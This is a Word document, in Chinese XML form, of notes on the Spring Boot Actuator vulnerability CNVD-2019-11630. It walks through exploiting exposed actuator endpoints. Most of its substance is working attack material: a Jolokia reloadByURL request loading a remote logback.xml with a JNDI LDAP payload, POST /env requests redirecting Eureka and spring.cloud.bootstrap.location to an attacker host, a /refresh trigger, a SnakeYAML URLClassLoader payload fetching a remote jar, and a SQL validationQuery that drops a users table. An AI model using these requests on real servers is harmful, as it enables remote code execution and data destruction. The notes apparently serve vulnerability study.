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CNVD-2019-11630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CNVD-2019-11630 Spring Boot Actuator命令执行漏洞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"https://www.veracode.com/blog/research/exploiting-spring-boot-actuators" \t "https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>https://www.veracode.com/blog/research/exploiting-spring-boot-actuators#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这个漏洞并不像是单一的问题产生，更像是一个渗透入侵的过程。有很多值得在意的知识点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Spring Boot 1-1.4，无需身份验证即可访问以下敏感路径，而在2.x中，存在于/actuator路径下。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/dump-显示线程转储（包括堆栈跟踪）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/trace-显示最后几条HTTP消息（其中可能包含会话标识符）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/logfile-输出日志文件的内容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/shutdown-关闭应用程序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/mappings-显示所有MVC控制器映射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/env-提供对配置环境的访问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/restart-重新启动应用程序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jolokia进行远程代码执行，Jolokia允许通过HTTP访问所有已注册的MBean，并且旨在执行与JMX相同的操作。可以使用URL列出所有可用的MBeans操作：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1:8090/jolokia/list" \t "https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8090/jolokia/list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Logback库提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>reloadByURL</w:t>
      </w:r>
      <w:r>
        <w:t>操作使我们可以从外部URL重新加载日志配置，地址如：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http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml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logback.xml：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&lt;configuration&gt;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 xml:space="preserve">  &lt;insertFromJNDI env-entry-name="ldap://artsploit.com:1389/jndi" as="appName" /&gt;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&lt;/configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>reloadByURL功能从</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://artsploit.com/logback.xml%E4%B8%8B%E8%BD%BD%E6%96%B0%E9%85%8D%E7%BD%AE%EF%BC%8C%E5%B9%B6%E5%B0%86%E5%85%B6%E8%A7%A3%E6%9E%90%E4%B8%BALogback%E9%85%8D%E7%BD%AE%E3%80%82%E8%BF%99%E5%B0%B1%E5%AF%BC%E8%87%B4%E4%B8%A4%E4%B8%AA%E9%97%AE%E9%A2%98%EF%BC%9AXXE%E7%9B%B2%E6%94%BB%E5%87%BB%E3%80%81%E6%81%B6%E6%84%8FLDAP%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E5%BC%95%E7%94%A8%E5%AF%BC%E8%87%B4RCE%E3%80%82" \t "https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>http://artsploit.com/logback.xml下载新配置，并将其解析为Logback配置。这就导致两个问题：XXE盲攻击、恶意LDAP服务器解析引用导致RCE。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通过/env来修改配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>如果Spring Cloud Libraries在类路径中，则**’/ env’**端点允许您修改Spring环境属性。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POST /env HTTP/1.1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Host: 127.0.0.1:8090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Content-Type: application/x-www-form-urlencoded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Content-Length: 65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eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>此属性将Eureka serviceURL修改为任意值。Eureka Server通常用作发现服务器，目标类路径中具有Eureka-Client &lt;1.8.7，则可以利用其中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>XStream反序列化漏洞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>然后调用’/ refresh’端点。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有一种通过Spring环境属性修改来实现RCE的更可靠方法：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POST /env HTTP/1.1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Host: 127.0.0.1:8090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Content-Type: application/x-www-form-urlencoded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Content-Length: 59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spring.cloud.bootstrap.location=http://artsploit.com/yaml-payload.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>该请求修改了“ spring.cloud.bootstrap.location”属性，该属性用于加载外部配置并以YAML格式解析它。为了做到这一点，我们还需要调用“/refresh”端点。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POST /refresh HTTP/1.1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Host: 127.0.0.1:8090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Content-Type: application/x-www-form-urlencoded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Content-Length: 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>从远程服务器获取YAML配置时，将使用SnakeYAML库进行解析，该库也容易受到反序列化攻击。有效载荷（yaml-payload.yml）可以通过使用前述的Marshalsec研究生成：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!!javax.script.ScriptEngineManager [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  !!java.net.URLClassLoader [[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    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]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  ]]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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>该jar文件的反序列化将触发提供的URLClassLoader的ScriptEngineManager构造函数的执行。jar文件可以在如下地址找到：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/artsploit/yaml-payload" \t "https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>https://github.com/artsploit/yaml-payload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/env配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>除了关于执行RCE的地方，还有一些设置也很有用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>**spring.datasource.tomcat.validationQuery = drop + table + users-**允许您指定任何SQL查询，它将针对当前数据库自动执行。它可以是任何语句，包括插入，更新或删除。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spring.datasource.tomcat.url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = jdbc:hsqldb:</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://localhost:3002/xdb%E5%85%81%E8%AE%B8%E6%82%A8%E4%BF%AE%E6%94%B9%E5%BD%93%E5%89%8D%E7%9A%84JDBC%E8%BF%9E%E6%8E%A5%E5%AD%97%E7%AC%A6%E4%B8%B2%E3%80%82" \t "https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>https://localhost:3002/xdb允许您修改当前的JDBC连接字符串。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t>这种设置只在1.x</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>中，在Spring Boot 2.x中，改为了json格式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54846"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95A548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9DAE774"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99DAE7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324C7EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B324C7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DD3A1E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDD3A1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721A70F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0721A7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44AA00F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="444AA0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F67397D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F6739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7362132"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="673621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775BB9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7775BB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FF4891D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7FF489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C4C0D"/>
    <w:rsid w:val="389C4C0D"/>
    <w:rsid w:val="4A31715A"/>
    <w:rsid w:val="596D7F37"/>
    <w:rsid w:val="735F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2021-10-15T08:58:00Z</dcterms:created>
  <dc:creator>bingjie</dc:creator>
  <cp:lastModifiedBy>bingjie</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-15T10:03:56Z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EF08EBBD632D40DF8C67716AC6714D53</vt:lpwstr>
  </property>
</Properties>
</file>